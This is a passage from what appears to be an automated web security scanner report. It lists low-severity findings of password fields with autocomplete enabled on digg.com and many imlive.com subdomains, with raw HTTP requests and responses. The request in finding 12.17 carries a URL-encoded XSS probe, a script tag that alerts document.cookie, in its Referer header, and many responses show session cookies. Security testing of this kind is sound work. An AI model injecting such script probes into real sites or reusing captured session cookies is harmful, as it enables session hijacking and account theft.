<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.9. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with no action attribute, so it submits to the requested URL (/submit).
The form contains the following password field with autocomplete enabled:
password

Request

GET /submit?phase=2&url=http://www.bostonherald.com HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:29 GMT; path=/; domain=digg.com
Set-Cookie: d=77e17940db831f181383a5bb3cb5c736d63ecf04d0fe3deac9bb624c4d81a73d; expires=Thu, 28-Jan-2021 15:33:09 GMT; path=/; domain=.digg.com
X-Digg-Time: D=37770 10.2.128.190
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7660

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

12.10. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with no action attribute, so it submits to the requested URL (/submit).
The form contains the following password field with autocomplete enabled:
password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:28 GMT; path=/; domain=digg.com
Set-Cookie: d=f148f02d29ba659b182b1c54e053268c0b2309202a4d0c9ea1fb51eef766d1ad; expires=Thu, 28-Jan-2021 15:33:08 GMT; path=/; domain=.digg.com
X-Digg-Time: D=27902 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

12.11. http://dk.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nn1y4duqur04onbqzv5cab45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nn1y4duqur04onbqzv5cab45; path=/; HttpOnly
Set-Cookie: spvdr=vd=6b4ad7c2-4fe9-446c-bd92-1540c020264b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:06 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:06 GMT
Connection: close
Content-Length: 17878
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.12. http://es.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vchlbzedqlcfhl45ve5fslub; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=vchlbzedqlcfhl45ve5fslub; path=/; HttpOnly
Set-Cookie: spvdr=vd=8e4ca1d5-377c-48cd-a6db-d82638510b03&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:08 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 18321
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.13. http://fr.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fr.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=biwlqs45r3p1b2nlyi4uyly4; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=biwlqs45r3p1b2nlyi4uyly4; path=/; HttpOnly
Set-Cookie: spvdr=vd=49cda1d5-e336-4ec8-bd41-d08c0704718a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:18 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:17 GMT
Connection: close
Content-Length: 18534
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.14. http://gr.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gr.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=qarha0jvy2pajv55jux4d3jl; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=qarha0jvy2pajv55jux4d3jl; path=/; HttpOnly
Set-Cookie: spvdr=vd=acc31a9c-64aa-4483-a09d-06f887e53a48&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:21 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:20 GMT
Connection: close
Content-Length: 20472
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.15. http://imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0W5s89nS82L1Y30bT54fyWa09YbZxWHM4PkcHt5cVPiM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:16 GMT
Connection: close
Content-Length: 18944
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.16. http://imlive.com/homepagems3.asp

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The page contains a form with the following action URL:
homepagems3.asp?
The form contains the following password field with autocomplete enabled:
header_password

Request

GET /homepagems3.asp HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 13:59:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 13:59:08 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10201


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<td align=right>
   <form onsubmit="return CheckForm(this);" method="post" action="homepagems3.asp?" style="margin:0;" name="frmLogin" ID="frmLogin"><input type="hidden" name="func" id="func" value="log">
...[SNIP]...
<div style="display:inline;" id="PwdParent"><input type="password" name="header_password" id="header_password" class="inputhead"></div>
...[SNIP]...

12.17. http://imlive.com/webcam-login/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-login/

Issue detail

The page contains a form (name="frm") with no action attribute, so it submits to the requested URL (/webcam-login/).
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET /webcam-login/ HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:06:25 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 21541


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<div class="LoginPart minH">
<form onsubmit="return IsValidLogin(this)" method="post" name="frm">
<span id="ctl00_BodyContentPlaceHolder_lWelcome" class="loginWelcome">
...[SNIP]...
</label>
<input type="password" id="txtPassword" name="txtPassword" tabindex="2" />
<input type="submit" value="Submit" tabindex="4" />
...[SNIP]...

12.18. http://in.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xgztykig5g3mkg55rbuiufv2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xgztykig5g3mkg55rbuiufv2; path=/; HttpOnly
Set-Cookie: spvdr=vd=4fbca91b-ec62-43d7-a59a-b2e914467e3f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:35 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 20907
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.19. http://it.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=yioqjz3reg4ourimvrkbrbrd; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=yioqjz3reg4ourimvrkbrbrd; path=/; HttpOnly
Set-Cookie: spvdr=vd=d3cc5bc2-bab2-416e-acff-891f674e66d4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:49 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:49 GMT
Connection: close
Content-Length: 18113
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.20. http://jp.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rgsy1a453yb3np55fmwslhyw; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=rgsy1a453yb3np55fmwslhyw; path=/; HttpOnly
Set-Cookie: spvdr=vd=eb9d52f6-9629-4754-bdff-f15e37967440&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:02 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 19088
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.21. http://mx.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mx.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wytymorw54fw1s453wwi1b45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wytymorw54fw1s453wwi1b45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a13018e7-4eaf-491b-9a58-2a08ebf5d10b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:13 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:13 GMT
Connection: close
Content-Length: 18291
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.22. http://nl.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=de304g55lx13wkfega5qpc55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=de304g55lx13wkfega5qpc55; path=/; HttpOnly
Set-Cookie: spvdr=vd=172f260c-f292-40e5-922e-4377befca272&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:14 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
